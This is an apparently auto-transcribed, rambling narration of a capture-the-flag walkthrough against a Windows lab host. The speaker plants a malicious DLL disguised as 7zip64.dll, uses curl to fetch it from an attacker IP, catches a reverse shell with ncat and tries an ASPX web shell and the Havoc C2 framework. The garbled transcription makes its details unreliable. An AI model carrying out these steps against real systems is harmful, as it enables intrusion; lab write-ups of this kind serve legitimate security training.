Python listener, and then let me say here 8080. It's working on 80, right? Yes, and I got it here, and it says like that. And the system share bg phone exe on my IP addresses. Alright, let's look like okay. So let's say here anchor listener and 505, and the Python listener is over here. So then I think we need to be this is our less.c, right? So let's say if the less.c here less.dll like here, right? So let's say less.c is there something wrong? Can we say how we do that? Okay, x64 less.c, so less.d. So let's set it on ChatGPT maybe. Should I use like that? So my last.dll is over here. So can I set it right now as like I did before? Let's say curl I think I have to be starting here. So I have to be now curl http 10.10. -o C Windows tasks and test.dll. Okay, and a copy test.dll as like here -o C share, right? Yes, share scripts and zip64.dll, and then like here, yes, copy C Windows test C share scripts Windows devs. The syntax of command is incorrect. Which one is incorrect here? It's because -o, right? Let's say copy selection. Nope. Let's do it like that. It's need to be work right now. What's wrong? Shit. Bro. Okay. Let's select this one more time. Curl HTTP timeout on here with on this port and then last.dll and -o. Let's say 7zip 64.dll. Let's say there. We cannot upload it here file, right? So let me try to go Windows and let's go temp, and I think we can call it here one more time. Let's say here dir and or 7zip6dll is over here. So I think we can say his copy and give this file name as like here, and then we can copy this from cd share scripts and is which one is 7zip64dll as like here. Should we like overwrite here, let's say all, and then one file is copied, it says, and then maybe it's need to be gathered here. Is it like how it's working? As the same method, then I think we can do. It has to be giving us here shell is over there. So is there an Anka64X is already here? So then I think it means we can bucket with like here directly, I imagine. If it's not give me any, but it's need to be gathered here Anka64.exe, but I don't know why it's not. So as it could be we are on the wrong one. It's need to be got here. Yes, everything is look like is here wrong. Is not nothing look like wrong here. I cannot get it here what's wrong. So can we try to be with this again? So let's say x, okay, let's do the DLL. I don't know where is wrong. Then I think this was the correct one to here, right? I'm not sure. So you know what, let's use here Havoc, and that will be my let's use it here. Okay, Havoc GitHub. It's could be how a Korean framework like this. Okay. Um. Okay. So no, it's not working. So git clone. I work here. Um. Let's say is it could be here like a team server. Oh, it's team servers here. Does it look like a from here team server and server dash dash profile and dash profiles and utility. There's no fucking way. Now it's not working. So I don't know why while I wasn't successful to be get here something different. Let's say this to be different here, different way. Um, we maybe we can check it. Seal config the lock. So let's say here, dear. Why we cannot type it? It's just giving us one files copied, really? Can we run it here right now? Work. Like that, I mean. Maybe like that. Oh my god, bro. There is no way, bro. There is no way. I don't want to wake you up, but I cannot do it here and think. Does look like no one's. So let's check the third one, what he is using actually here. Um, mm, let's say nano dll.c. Then I think we have to be change here something like 444, and this one with let's say this one. Great. Then need to be work with this. Okay, this is our 7-zip late DLL. Then we need to be uploaded it. Okay, let me say here Python listener on AD port, and then I think we have to be starting here and listener for 444, and then curl-s http 10.10. Oh no, it means my file 7-zip-o. So I think we have to be set on cd share and scripts, right? There and curl http 10.10 on this port. No, we were listening on AD port, right? Dash o, so let's zip.dll. What's wrong? Oh, I think that's okay. So after that, C was D, and it's Scally here, 7.0. And about a minute later, to get shell, and we can reduce a flag successfully, as like here. So let's try to waiting for it. Oh, we can check it for privilege escalation here, I think. Is it says us after a minute later, so we need to be waiting really for a minute. I don't know where's wrong, bro. I think there's something wrong with about the machine. So it has to be giving here the here shell. Oh yeah, it's got it here. Oh, it's because NCAT is not found. Oh shit. Oh shit. Oh shit. Elliot documents and active directory. and add her. And what would we call it here? Sublime text dll.c. Yes, we have to be changed with encat64.exe file. That's right. So let's actually remove 7zip.dll. Oh my god, that was working. It's my fault. It's just my fault. And then x, so we need to be shared. Then let's say Python listener here. Then we need to be go here. Curl HTTP on. As you know, we have to be working with this. Right. HTTP and 10 dot and 10 dot and 16 and 25. And which one we want to be get here. I think it needs to be here 7zip.dll and then dash o as with the same name, right? Just need to be saving here, I think. Oh, that's because of not work like this. So we need to be get reverse shell here one more time. I think it's we got here wrong. Why? So anyway, so we need to be file manager shell.eat shell2 acpx why not work. Get MLP 444. Let's say delete zap zone, upload files, select files, shell to acpx, upload, and .txt, forward and forward it into zap zone. Not delete the copy to acpx. Let's say it's copied, and then I think we can work it with right now on encat listener. So if I'm trying to be go here, it has to be giving me as a the shell. I think I don't know why it's not. So we cannot get shell here actually. Exit is not found, right? So we need to be changed, I imagine. So let's say SMB cleaned, can we go? And then let me try to go scripts and put 7zip.dll and the show, and I think Python listener will be here. I think 7zip.dll puts like I think it's could be here put let's say dear let's maybe we can try to be change here shell to acpx sublime text shell to acpx with it's why because it was working on encat listener on or 222, right? So let's send it one more time, and I think we can go is here share here and the secrets, I think here. We can exit here, and then last I think need to be save it here is curl. I need to say dash s http and 10 dot and 14 and 13 on this 80 port for sure, and dash o 7 zip64.dll here. So if I'm gonna say change it with this, yeah, as it's sending successfully, then I think it will get here and get.exe after a minute. So then we can get it here something wrong, something like that. Alright, so if I'm checking here who am I, then we are successfully get here shell from Join Wild. So let me say dir, then I think we can try to go see users dir, and let's go Join Wild. Right, say let me say here dir and go for desktop and dir type user.txt, and successfully we get here user.txt, right? And that was really cool. I really like it. So after that all, we need to be get heroes pullage escalation. So I'm actually checking here, can I do it really fast? I imagine. So let's check another different here on the C. So maybe we can say dir dash hidden, as like, can we say PowerShell here? Can we go? Then I think it's yes. And let's say ls dash hidden. So recycle binary, we got here actually. So we can use it directly, which was here cd and recycle.binary here. So kernel programs, the path is not full, so we cannot running here to go is nothing here, but you know what we can say, dir, so if we cannot go, we can say dir binary dash s or something like that. Alright, so there's nothing look like it's working, right? So after that all we cannot go, right? So let me say here dir, and there is nothing recycle binary or something like that. So it's like it's not working. So I think that's okay to be doing here too many things, and I was low here. You can check privilege escalation for this, and it was not hard. Look like it's like a 2 minutes to do it. So you can check it here. I'm really tired right now, and thank you for watching this video.